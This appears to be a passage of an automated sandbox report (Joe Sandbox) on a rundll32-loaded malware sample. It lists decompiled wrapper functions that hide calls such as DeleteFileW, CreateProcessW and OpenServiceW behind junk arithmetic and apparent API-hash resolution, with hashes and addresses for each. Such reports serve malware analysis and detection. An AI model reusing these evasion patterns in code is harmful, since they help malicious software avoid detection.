String ID: 1$,*FV$.9h
API String ID: 1029625771-1870595533
Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction ID: f939e8868e41264d0ae7c2dbdfb413304c27b225558119594ab733ca0e049485
Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction Fuzzy Hash: 8D2156B5D00208FBEF08DFA8D94A9EEBBB5FB40304F108199E915B6250E3B46B14DF91

Uniqueness

Uniqueness Score: -1.00%

Function 04871538, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E04871538(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t59;
				int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;

				_push(_a4);
				E0486FE29(_t59);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x73095a;
				_v28 = 0xd34a52;
				_v16 = 0xb3a153;
				_t77 = 0x73;
				_v16 = _v16 / _t77;
				_v16 = _v16 + 0x4fd2;
				_v16 = _v16 ^ 0xee3af97f;
				_v16 = _v16 ^ 0xee3510f4;
				_v20 = 0xee2064;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x88190a0a;
				_v12 = 0x72c7a5;
				_v12 = _v12 + 0x7839;
				_t78 = 0x77;
				_v12 = _v12 / _t78;
				_t79 = 0x76;
				_v12 = _v12 / _t79;
				_v12 = _v12 ^ 0x00040652;
				_v8 = 0x10c7fb;
				_t80 = 0x6c;
				_v8 = _v8 * 0x70;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t80;
				_v8 = _v8 ^ 0x00c83f8f;
				E0485EB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
				_t75 = FindCloseChangeNotification(_a4); // executed
				return _t75;
			}

0x0487153e
0x04871543
0x04871548
0x0487154f
0x04871558
0x0487155f
0x0487156b
0x04871570
0x04871575
0x0487157c
0x04871583
0x0487158a
0x04871591
0x04871595
0x0487159c
0x048715a3
0x048715ad
0x048715b2
0x048715ba
0x048715bf
0x048715c4
0x048715cb
0x048715d6
0x048715e6
0x048715e9
0x048715f3
0x048715f6
0x0487160a
0x04871615
0x0487161a

APIs

FindCloseChangeNotification.KERNEL32(00040652), ref: 04871615

Strings

Zs, xrefs: 0487154F
d , xrefs: 0487158A

Memory Dump Source

Source File: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true

Associated: 00000005.00000002.251013263.0000000004850000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.251051869.0000000004876000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: Zs$d
API String ID: 2591292051-3879001491
Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction ID: f2a5997f4b6175318244370a802ad8d9550625402e4db70594a44253473f4ec5
Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction Fuzzy Hash: DF213EB5D40209FFEB04DFA5D9499DDBBB1EB40314F10C099E614BB250D7B96B548F80

Uniqueness

Uniqueness Score: -1.00%

Function 0485D061, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0485D061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t69;

				_push(_a12);
				_t69 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0486FE29(_t54);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xa62646;
				_v32 = 0x27199b;
				_v20 = 0x942c55;
				_v20 = _v20 | 0xf0368afe;
				_v20 = _v20 << 0xa;
				_v20 = _v20 ^ 0xfbcaf84d;
				_v20 = _v20 ^ 0x217d6c33;
				_v16 = 0xf28622;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 | 0xeb4a9877;
				_v16 = _v16 ^ 0x2aded5e4;
				_v16 = _v16 ^ 0xc19eb21f;
				_v12 = 0x4a5837;
				_v12 = _v12 ^ 0xa3e571b7;
				_v12 = _v12 + 0xffff6305;
				_t65 = 0x6e;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x01794185;
				_v8 = 0xa209ee;
				_v8 = _v8 + 0x62d2;
				_v8 = _v8 ^ 0x3d892cf6;
				_v8 = _v8 | 0x5ca7d1ce;
				_v8 = _v8 ^ 0x7da8dabc;
				E0485EB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
				_t63 = DeleteFileW(_t69); // executed
				return _t63;
			}

0x0485d068
0x0485d06b
0x0485d06d
0x0485d070
0x0485d074
0x0485d075
0x0485d07a
0x0485d081
0x0485d087
0x0485d08e
0x0485d095
0x0485d09c
0x0485d0a3
0x0485d0a7
0x0485d0ae
0x0485d0b5
0x0485d0bc
0x0485d0c0
0x0485d0c7
0x0485d0ce
0x0485d0d5
0x0485d0dc
0x0485d0e3
0x0485d0ef
0x0485d0f7
0x0485d0fa
0x0485d101
0x0485d108
0x0485d10f
0x0485d116
0x0485d11d
0x0485d13c
0x0485d145
0x0485d14b

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0485D145

Strings

3l}!, xrefs: 0485D0AE
7XJ, xrefs: 0485D0D5

Memory Dump Source

Source File: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true

Associated: 00000005.00000002.251013263.0000000004850000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.251051869.0000000004876000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: 3l}!$7XJ
API String ID: 4033686569-2205417827
Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction ID: c1797ad59b6353d39c896802bb09d1929e173c7f788fc02d2c5d29222e33a677
Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction Fuzzy Hash: E12148B5D00318AFDF08DFA4C98A9DEFBB0FF14304F108188E966A6210D7B85B558F91

Uniqueness

Uniqueness Score: -1.00%

Function 04872C24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
processCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E04872C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v32;
				void* _t49;
				int _t56;
				WCHAR* _t60;

				_push(_a56);
				_t60 = __ecx;
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E0486FE29(_t49);
				_v32 = 0x534833;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0x70adbe;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x1d11c356;
				_v8 = _v8 ^ 0x1f145645;
				_v20 = 0xecea8a;
				_v20 = _v20 | 0x5baa72b8;
				_v20 = _v20 ^ 0x5be1d11d;
				_v16 = 0x76217f;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 | 0xe98780dc;
				_v16 = _v16 ^ 0xe98c1e91;
				_v12 = 0xeb975;
				_v12 = _v12 ^ 0xd8138edb;
				_v12 = _v12 | 0x0b4171d5;
				_v12 = _v12 ^ 0xdb5d9300;
				E0485EB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
				return _t56;
			}

0x04872c2c
0x04872c31
0x04872c33
0x04872c36
0x04872c37
0x04872c3a
0x04872c3d
0x04872c3e
0x04872c41
0x04872c44
0x04872c47
0x04872c4a
0x04872c4b
0x04872c4e
0x04872c4f
0x04872c51
0x04872c52
0x04872c57
0x04872c61
0x04872c64
0x04872c67
0x04872c6e
0x04872c72
0x04872c76
0x04872c7d
0x04872c84
0x04872c8b
0x04872c92
0x04872c99
0x04872ca0
0x04872ca4
0x04872cab
0x04872cb2
0x04872cb9
0x04872cc0
0x04872cc7
0x04872ce8
0x04872d02
0x04872d09

APIs

CreateProcessW.KERNEL32(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 04872D02

Strings

3HS, xrefs: 04872C57

Memory Dump Source

Source File: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true

Associated: 00000005.00000002.251013263.0000000004850000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.251051869.0000000004876000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 3HS
API String ID: 963392458-330188696
Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction ID: 2ea8e3b8a6c403218ac187dc22eea11f6bb33f810512ebd868b8a47642ab6daf
Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction Fuzzy Hash: 8521F372800248BBCF559F96DC0ACDFBFB9EF85704F108189F915A2220D3B59A24DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 048745CA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E048745CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t51;
				void* _t60;
				WCHAR* _t64;

				_push(_a48);
				_t64 = __ecx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E0486FE29(_t51);
				_v28 = 0x204d4f;
				_v24 = 0;
				_v20 = 0xd27984;
				_v20 = _v20 | 0x43788b11;
				_v20 = _v20 ^ 0x43f3df42;
				_v16 = 0xf976f1;
				_v16 = _v16 + 0xffff3d74;
				_v16 = _v16 | 0xfc5c4419;
				_v16 = _v16 ^ 0xfcfdb6fc;
				_v12 = 0xb7df7c;
				_v12 = _v12 + 0xffff3658;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x1f30f970;
				_v12 = _v12 ^ 0x12ab006a;
				_v8 = 0x8ba8ca;
				_v8 = _v8 | 0x62aa166a;
				_v8 = _v8 + 0xa2f6;
				_v8 = _v8 * 0x55;
				_v8 = _v8 ^ 0xc33acf6c;
				E0485EB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
				return _t60;
			}

0x048745d2
0x048745d7
0x048745d9
0x048745dc
0x048745df
0x048745e2
0x048745e5
0x048745e8
0x048745eb
0x048745ee
0x048745f1
0x048745f4
0x048745f5
0x048745f7
0x048745f8
0x048745fd
0x04874607
0x0487460a
0x04874611
0x04874618
0x0487461f
0x04874626
0x0487462d
0x04874634
0x0487463b
0x04874642
0x0487465d
0x04874660
0x04874667
0x0487466e
0x04874675
0x0487467c
0x04874688
0x0487468b
0x0487469e
0x048746b5
0x048746bc

APIs

CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 048746B5

Strings

OM , xrefs: 048745FD

Memory Dump Source

Source File: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true

Associated: 00000005.00000002.251013263.0000000004850000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.251051869.0000000004876000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: OM
API String ID: 823142352-4198367855
Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction ID: 0bb184f778dc19b09ed30b64b44c78daf3b54bc14112772b012d64d8b393df07
Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction Fuzzy Hash: E721E072801249BBCF05DFA9CD45CDEBFB5EF88304F508199F915A6120D3758A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 048744FF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E048744FF(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				intOrPtr* _t57;
				void* _t58;
				signed int _t60;
				signed int _t61;

				E0486FE29(_t47);
				_v20 = 0xa68a31;
				_t60 = 0x6d;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x00000260;
				_v16 = 0xfa9629;
				_v16 = _v16 + 0x734b;
				_v16 = _v16 ^ 0x638d356d;
				_v16 = _v16 ^ 0x637ea9c8;
				_v8 = 0x3f26ab;
				_v8 = _v8 ^ 0xcdd207a4;
				_v8 = _v8 ^ 0xb6eb62c4;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x0005a548;
				_v12 = 0xe291fe;
				_t61 = 0x24;
				_v12 = _v12 / _t61;
				_v12 = _v12 + 0x3d74;
				_v12 = _v12 ^ 0x00095158;
				_t57 = E0485EB52(_t61, _t61, 0x418e972c, 0x54, 0xa2289af1);
				_t58 =  *_t57(_a24, 0, _a20, 0x28, __ecx, __edx, 0, _a8, 0x28, _a16, _a20, _a24); // executed
				return _t58;
			}

0x04874517
0x0487451c
0x0487452d
0x04874532
0x04874537
0x0487453e
0x04874545
0x0487454c
0x04874553
0x0487455a
0x04874561
0x04874568
0x0487456f
0x04874573
0x0487457a
0x04874584
0x0487458c
0x0487458f
0x04874596
0x048745b2
0x048745c4
0x048745c9

APIs

SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 048745C4

Strings

XQ, xrefs: 04874596

Memory Dump Source

Source File: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true

Associated: 00000005.00000002.251013263.0000000004850000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.251051869.0000000004876000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID: XQ
API String ID: 3935143524-1200779947
Opcode ID: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
Instruction ID: 3968b555f9369ff98cd1004eaa4fa4d5a8153b0814e3da1d368d16439f45be49
Opcode Fuzzy Hash: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
Instruction Fuzzy Hash: 6B213871E4020CFBEF44CFA5DC4AAAEBBB1EB54704F108189BA10A6290D3F59A649F40

Uniqueness

Uniqueness Score: -1.00%

Function 0485EE62, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0485EE62(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16, short* _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t34;
				void* _t41;
				void* _t44;

				_push(_a20);
				_t44 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0486FE29(_t34);
				_v20 = 0xea751a;
				_v20 = _v20 | 0xe9b69993;
				_v20 = _v20 ^ 0xe9f29d6b;
				_v16 = 0x605393;
				_v16 = _v16 | 0xcc974431;
				_v16 = _v16 ^ 0xccf8b40a;
				_v12 = 0x102a1a;
				_v12 = _v12 + 0xcb09;
				_v12 = _v12 ^ 0x001131dd;
				_v8 = 0x570378;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0xef617e60;
				_v8 = _v8 ^ 0xef696bf9;
				E0485EB52(__ecx, __ecx, 0x5c98ffad, 5, 0x1f76e49f);
				_t41 = OpenServiceW(_t44, _a20, _a16); // executed
				return _t41;
			}

0x0485ee69
0x0485ee6c
0x0485ee6e
0x0485ee71
0x0485ee74
0x0485ee77
0x0485ee7a
0x0485ee7b
0x0485ee7c
0x0485ee81
0x0485ee8b
0x0485ee92
0x0485ee99
0x0485eea0
0x0485eea7
0x0485eeae
0x0485eeb5
0x0485eebc
0x0485eec3
0x0485eeca
0x0485eece
0x0485eed5
0x0485eef6
0x0485ef05
0x0485ef0b

APIs

OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0485EF05

Strings

`~a, xrefs: 0485EECE

Memory Dump Source

Source File: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true

Associated: 00000005.00000002.251013263.0000000004850000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.251051869.0000000004876000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: `~a
API String ID: 3098006287-142445290
Opcode ID: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
Instruction ID: 821980144403c746ae9dc2d7311badeb076008df7ebf56cdcdd86b48aac53b17
Opcode Fuzzy Hash: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
Instruction Fuzzy Hash: 7C11F575C01218FBDF48DFA5DD0A8DEBFB5EB04314F108988F91566261D3B59B20AF92

Uniqueness

Uniqueness Score: -1.00%

Function 0486648A, Relevance: 1.6, APIs: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0486648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				void* _t49;
				long _t52;

				_push(_a16);
				_t52 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0486FE29(_t41);
				_v12 = 0x3cd3f;
				_v12 = _v12 << 3;
				_v12 = _v12 | 0xc677f757;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0188bcff;
				_v20 = 0x40fc9e;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x040306b1;
				_v16 = 0x159e9f;
				_v16 = _v16 + 0xffffd0d5;
				_v16 = _v16 * 0x33;
				_v16 = _v16 ^ 0x04433238;
				_v8 = 0x8a430d;
				_v8 = _v8 + 0xffffdfbc;
				_v8 = _v8 | 0x5356d001;
				_v8 = _v8 + 0x638e;
				_v8 = _v8 ^ 0x53d0144a;
				E0485EB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
				return _t49;
			}

0x04866491
0x04866494
0x04866496
0x04866499
0x0486649c
0x048664a0
0x048664a1
0x048664a6
0x048664b0
0x048664b4
0x048664bb
0x048664bf
0x048664c6
0x048664cd
0x048664d1
0x048664d8
0x048664df
0x048664fa
0x048664fd
0x04866504
0x0486650b
0x04866512
0x04866519
0x04866520
0x04866534
0x04866543
0x04866549

APIs

RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 04866543

Memory Dump Source

Source File: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true

Associated: 00000005.00000002.251013263.0000000004850000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.251051869.0000000004876000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction ID: 61e5e8f61c3c285753616de29de1e3d71e69022efeafba4b110511ca39642e5e
Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction Fuzzy Hash: AC11F2B2C0121DBBDF05DFA5D9098DEBBB4EB00314F108598E911A6250E3B59B149F92

Uniqueness

Uniqueness Score: -1.00%

Function 0486E8B6, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0486E8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t29;
				void* _t37;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E0486FE29(_t29);
				_v20 = 0xc8e76b;
				_v20 = _v20 | 0x270203a1;
				_v20 = _v20 ^ 0x27c97096;
				_v16 = 0x55aebc;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00171a80;
				_v12 = 0xfad6fe;
				_v12 = _v12 ^ 0xd14a4d1d;
				_v12 = _v12 ^ 0xd1b10da7;
				_v8 = 0x428060;
				_v8 = _v8 * 0x54;
				_v8 = _v8 ^ 0x15de1a76;
				E0485EB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
				_t37 = OpenSCManagerW(0, 0, _a12); // executed
				return _t37;
			}

0x0486e8bd
0x0486e8c2
0x0486e8c5
0x0486e8c6
0x0486e8ca
0x0486e8cb
0x0486e8d0
0x0486e8da
0x0486e8e1
0x0486e8e8
0x0486e8ef
0x0486e8f3
0x0486e8fa
0x0486e901
0x0486e908
0x0486e90f
0x0486e92a
0x0486e92d
0x0486e941
0x0486e94e
0x0486e954

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 0486E94E

Memory Dump Source

Source File: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true

Associated: 00000005.00000002.251013263.0000000004850000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.251051869.0000000004876000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction ID: 938c53b4b3e55326cd15be01af03656cbed890c5fb169693d3b67aa8323368d6
Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction Fuzzy Hash: CE11157190221DFB9B04EFA89D468DEBFB4EB04308F108588E925B2211D3B19B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 0486D11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0486D11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				E0485EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x0486d120
0x0486d124
0x0486d12b
0x0486d132
0x0486d139
0x0486d140
0x0486d144
0x0486d14b
0x0486d14f
0x0486d156
0x0486d15d
0x0486d164
0x0486d16b
0x0486d172
0x0486d176
0x0486d17d
0x0486d184
0x0486d18b
0x0486d1ac
0x0486d1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 0486D1B6

Memory Dump Source

Source File: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true

Associated: 00000005.00000002.251013263.0000000004850000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.251051869.0000000004876000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 4d64985ec6ef8807c0a247dd2fa85137c993b46fc43e29b5e085f8f08865eea1
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: 491112B1C4030CEBDB44DFE5D94A6DEFBB0EB00709F108588D921B6250E3B89B489F91

Uniqueness

Uniqueness Score: -1.00%

Function 0487061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0487061D(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0486FE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E0485EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x04870624
0x04870627
0x04870629
0x0487062c
0x0487062f
0x04870630
0x04870631
0x04870636
0x0487063d
0x04870644
0x0487064b
0x0487064f
0x04870667
0x0487066a
0x04870671
0x04870678
0x0487067f
0x0487068b
0x0487068e
0x04870695
0x0487069c
0x048706a3
0x048706aa
0x048706b1
0x048706b8
0x048706bf
0x048706c6
0x048706d9
0x048706e5
0x048706eb

APIs

lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 048706E5

Memory Dump Source

Source File: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true

Associated: 00000005.00000002.251013263.0000000004850000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.251051869.0000000004876000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 5c71d54d390b9d8a26b6eaf81520ff061b626a309dc3312ff0c4cc6a78bab51b
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: 212113B1C01309ABCF14DFA9D9499DEBFB5FB10354F108298E529B6251D3B49B04CF91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

